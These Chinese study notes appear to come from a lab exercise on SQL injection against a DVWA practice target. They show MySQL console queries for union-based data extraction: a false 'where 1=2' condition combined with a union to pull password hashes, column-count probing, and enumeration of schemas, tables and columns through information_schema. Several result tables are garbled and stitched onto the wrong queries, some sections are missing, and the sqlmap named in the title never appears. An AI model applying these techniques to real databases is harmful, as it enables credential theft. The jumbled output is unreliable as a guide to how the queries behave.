sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记

sql 注入-通过注入点漏洞获得数据库数据-kali-sqlmap

0.靶机 mysql 登录

# mysql -uroot -powaspbwa

1.sql 注入分类

手动注入和工具自动注入

2.两种重要的 sql 查询

1). or where 1=1 #只能查询该表的一张表

2). union 查询 #可构建联合查询，查询多张表

3.union 联合查询注意

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

| user_id | first_name | last_name | user | password | avatar |

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |

| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge';

Empty set (0.00 sec)

mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge' or 1=1 limit 2;

+---------+------------+-----------+

(1).显示的字段名是前面表的，显示的值也是前面表的

mysql> select user,password from mysql.user limit 2;

+------+-------------------------------------------+

| user | password |

+------+-------------------------------------------+

| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |

| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |

+------+-------------------------------------------+

mysql> select user_login,user_pass from wordpress.wp_users limit 2;

+------------+----------------------------------+

+------+-------------------------------------------+

| user | password |

+------+-------------------------------------------+

| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |

| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |

+------+-------------------------------------------+

(2).显示的字段名是前面表的，显示的值则是后面面表的——使用 where 1=2 构造前面 sql 语句的假条件

mysql> select user,password,host from mysql.user limit 2;

+------+-------------------------------------------+---------------+

| user | password | host |

| user_login | user_pass | user_nicename |

+------------+----------------------------------+---------------+

| admin | 21232f297a57a5a743894a0e4a801fc3 | admin |

| user | ee11cbb19052e40b07aac0ca060c23ee | user |

+------------+----------------------------------+---------------+

mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 2;

+-------+----------------------------------+------+

| user | password | host |

+-------+----------------------------------+------+

| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |

| user_id | first_name | last_name | user | password | avatar |

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |

| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |

| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |

| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://127.0.0.1/dvwa/hackable/users/pablo.jpg |

| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://127.0.0.1/dvwa/hackable/users/smithy.jpg |

| 6 | user | user | user | ee11cbb19052e40b07aac0ca060c23ee | http://127.0.0.1/dvwa/hackable/users/1337.jpg |

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

mysql> select * from dvwa.users union select 1;

ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select * from dvwa.users union select 1,2,3,4,5;

ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select * from dvwa.users union select 1,2,3,4,5,6;

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

| user_id | first_name | last_name | user | password | avatar |

+---------+------------+-----------+---------+----------------------------------+--------------------------------------------------+

| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | http://127.0.0.1/dvwa/hackable/users/admin.jpg |

| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://127.0.0.1/dvwa/hackable/users/gordonb.jpg |

| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://127.0.0.1/dvwa/hackable/users/1337.jpg |

5.数据库字典

1).数据库字典概述

保存了数据库里所有库，所有表，所有列的元数据信息。

该库不保存数据，只保存了信息有什么表，什么库，什么字段等，被称为数据库字典，该库是：information_schema.

2).常用的使用数据库字典查询相应信息

查询整个数据库里所有数据库名和表名:

mysql> select * from information_schema.tables\G #查到的 TABLE_SCHEMA:xx 是库名，TABLE_NAME:xx 是表名

只查询整个数据库里所有库名并去重：

mysql> select distinct table_schema from information_schema.tables;

只查询整个数据库里所有表名并去重：

mysql> select distinct table_name from information_schema.tables;

只查询某个库(mysql 库)里的所有的表：

mysql> select table_schema,table_name from information_schema.tables where table_schema='mysql';

分组查询：所有数据库里各自都有自己的什么表：

mysql> select table_schema,group_concat(table_name) from information_schema.tables group by table_schema\G

下面重要：

查询整个数据库里所有数据库名，所有表名，所有字段名：

mysql> select distinct table_schema from information_schema.columns;

查询整个数据库里所有表名—去重：

mysql> select column_name from information_schema.columns;

只查询某个库的某个表的所有列名:（mysql 库的 user 表的所有列名）

mysql> select column_name from information_schema.columns where table_schema='mysql' and table_name='user';

3).使用数据库字典查询相应信息例子

查询整个数据库里所有数据库名，所有表名，所有字段名：

mysql> select * from information_schema.columns limit 2\G

*************************** 1. row ***************************

TABLE_CATALOG: NULL

TABLE_SCHEMA: information_schema #库名

TABLE_NAME: CHARACTER_SETS #表名

CHARACTER_SET_NAME: utf8

COLLATION_NAME: utf8_general_ci

COLUMN_TYPE: varchar(32)

COLUMN_KEY:

EXTRA:

PRIVILEGES: select

TABLE_CATALOG: NULL

TABLE_SCHEMA: information_schema

TABLE_NAME: CHARACTER_SETS

COLUMN_NAME: DEFAULT_COLLATE_NAME

ORDINAL_POSITION: 2

COLUMN_DEFAULT:

IS_NULLABLE: NO

DATA_TYPE: varchar

CHARACTER_MAXIMUM_LENGTH: 32

CHARACTER_OCTET_LENGTH: 96